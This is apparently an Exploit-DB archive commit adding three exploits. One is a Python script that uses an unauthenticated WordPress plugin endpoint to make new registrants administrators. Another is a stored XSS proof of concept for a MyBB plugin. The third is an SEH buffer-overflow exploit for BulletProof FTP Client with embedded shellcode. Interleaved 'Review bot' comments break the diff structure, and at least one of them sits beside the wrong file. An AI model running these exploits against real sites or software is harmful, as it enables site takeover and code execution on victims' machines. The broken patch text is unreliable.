From fe6788f41bc570fc63fa78e050429e05b32c7a67 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 7 Sep 2014 04:43:33 +0000
Subject: [PATCH] Updated 09_07_2014
---
 files.csv | 3 +++
 platforms/php/webapps/34538.txt | 43 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/34539.txt | 30 +++++++++++++++++++++++
 platforms/windows/dos/34540.py | 37 ++++++++++++++++++++++++++++
 4 files changed, 113 insertions(+)
 create mode 100755 platforms/php/webapps/34538.txt
 create mode 100755 platforms/php/webapps/34539.txt
 create mode 100755 platforms/windows/dos/34540.py
diff --git a/files.csv b/files.csv
index d736fd0c6..def69fa5a 100755
--- a/files.csv
+++ b/files.csv
@@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
 34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
 34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
+34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
+34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
+34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
diff --git a/platforms/php/webapps/34538.txt b/platforms/php/webapps/34538.txt
new file mode 100755
index 000000000..260801d18
--- /dev/null
+++ b/platforms/php/webapps/34538.txt
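Review bot: The date column of the new 34538 row (`2014-09-05`) disagrees with the advisory header this same commit adds in platforms/php/webapps/34538.txt (`#Date : February 5th, 2014`), so one of the two should be corrected before the index is relied on for disclosure timelines. The 34539 row also retitles its advisory (`MyBB User Social Networks Plugin 1.2 - Stored XSS` in the index versus `User Social Networks MyBB Plugin 1.2 - Cross Site Scripting` in the file); keeping the index description aligned with the file header avoids inconsistent search results.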
@@ -0,0 +1,43 @@
+#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
+#Author : Hannaichi [@dntkun]
+#Date : February 5th, 2014
+#Type : php, html, htm, asp, etc.
+#Category : Web Applications
+#Vulnerability : Unauthenticated Configuration Access
+#Tested On : Windows 7 32-bit | Google Chrome
+
+#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
+
+#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
+
+#POC :
+Save File As Python (.py) =
+import httplib, urllib
+
+#target site
+site = "victim" #<--- no http:// or https://
+#path to ajax.php
+url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
+
+def ChangeOption(site, url, option_name, option_value):
+ params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
+ headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+ conn = httplib.HTTPConnection(site)
+ conn.request("POST", url, params, headers)
+ response = conn.getresponse()
+ print response.status, response.reason
+ data = response.read()
+ print data
+ conn.close()
+
+ChangeOption(site, url, "admin_email", "youremail@test.com")
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")
+print "Now register a new user, they are an administrator by default!"
+
+
+#Place It Broo No Lazy For This :D !!
+
+--------------------------------------------------------------------------------------------------------------------
+
+Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
\ No newline at end of file
diff --git a/platforms/php/webapps/34539.txt b/platforms/php/webapps/34539.txt
new file mode 100755
index 000000000..c8ec9d0cd
--- /dev/null
+++ b/platforms/php/webapps/34539.txt
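Review bot: The advisory header records no affected plugin version and no remediation, so a defender reading it cannot tell which releases are exposed or what the corrective control is; it should carry a `#Version :` line and a `#Solution :` line, the latter presumably an authentication and capability check on the `save` action of `hades_framework/option_panel/ajax.php`, which the PoC reaches with no credential at all (confirm against the plugin source). The `#Date : February 5th, 2014` line also disagrees with the 2014-09-05 date this commit records in files.csv. The embedded script is Python 2 only (`print` statements, `httplib`, `urllib.urlencode`), which the `Save File As Python (.py) =` line should state. For detection, the request pattern visible in the PoC — unauthenticated POSTs to that ajax.php path carrying `action=save` — is what web-server logs should be searched for on sites running this plugin.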
@@ -0,0 +1,30 @@
+# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
+# Google Dork: N/A
+# Date: 05.09.2014
+# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
+# Vendor Homepage - N/A
+# Software Link: http://mods.mybb.com/view/user-social-networks
+# Version: 1.2
+# Tested on: PHP
+
+
+Description:
+This plugin allows you to add social networks, or related, in user
+profiles. The information will be shown in a user profile and visible for
+anyone who view the profile.
+
+Proof of Concept
+1. Login into your account.
+2. Go to "Edit Profile" page at "/usercp.php?action=profile"
+3. Update your Social Network ID with
+"><"
+4. The result can be seen in multiple places, including your profile page.
+
+* The script will be executed whenever anyone view your profile.
+** The result can also be seen in threads you involve IF the administrator
+configure this plugin to allow user's social sites information to be
+published in every post.
+
+Solution:
+Replace the content of "inc/plugins/usersocial.php" with this fix:
+http://pastebin.com/T1WgcwDB
diff --git a/platforms/windows/dos/34540.py b/platforms/windows/dos/34540.py
new file mode 100755
index 000000000..e6b023f27
--- /dev/null
+++ b/platforms/windows/dos/34540.py
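Review bot: Step 3 of the proof of concept reads only `"><"`, which looks as if the injected markup was stripped when the file was ingested, so the reproduction step is incomplete as committed and should describe the input in words rather than rely on raw markup surviving sanitisation. The Solution section points only to a pastebin link for a replacement `inc/plugins/usersocial.php`; such links decay, so the advisory should state the remediation inline — presumably output-encoding the user-supplied social-network ID wherever the plugin renders it (profile page and, per the note, every post) — and name the fixed plugin version if one exists. The header line `# Vendor Homepage - N/A` also breaks the colon style used on every other header line.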
@@ -0,0 +1,37 @@
+# !/usr/bin/python
+#-----------------------------------------------------------------------------#
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
+# Date: Sep 05 2014 #
+# Vulnerability Discovery: Gabor Seljan #
+# Exploit Author: Robert Kugler #
+# Software Link: http://www.bpftp.com/ #
+# Version: 2010.75.0.76 #
+# Tested on: Windows XP #
+# CVE: CVE-2014-2973 #
+# #
+# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
+# The "Enter URL" form is also vulnerable #
+#-----------------------------------------------------------------------------#
+
+buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
+buffer+= "\x20" + "\x90" * 89
+buffer+= "\xeb\x06\x90\x90"
+buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
+buffer+= "\x90" * 119 # 160 characters space
+buffer+= ("\x33\xc0\x50\x68"
+ "\x2E\x65\x78\x65"
+ "\x68\x63\x61\x6C"
+ "\x63\x8B\xC4\x6A" # 36 bytes
+ "\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
+ "\xfd\xe4\x77\xFF"
+ "\xD3\x33\xc0\x50"
+ "\xc7\xc0\x8f\x4a"
+ "\xe5\x77\xff\xe0")
+
+buffer+= "\x90" * (1000 - len(buffer))
+
+# Just load the "BP Session" and click on "Connect".
+
+file = open("ftpsession.bps","w")
+file.write(buffer)
+file.close()
\ No newline at end of file
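Review bot: The first line `# !/usr/bin/python` is not a shebang — the kernel only honours `#!` as the first two bytes — so the file cannot be run as `./34540.py` despite its 100755 mode; it should read `#!/usr/bin/python`. `file = open("ftpsession.bps","w")` shadows the Python 2 builtin `file` and closes the handle by hand; the idiomatic form is `with open("ftpsession.bps", "w") as f: f.write(buffer)`. The script is Python 2 only and the header should say so, and `buffer` shadows a builtin too. On the defender side the header does carry what is needed to match this to a fix (CVE-2014-2973, version 2010.75.0.76, Windows XP), and since the trigger is loading a crafted `.bps` session file, session files from untrusted sources should be treated as untrusted input until the client is updated.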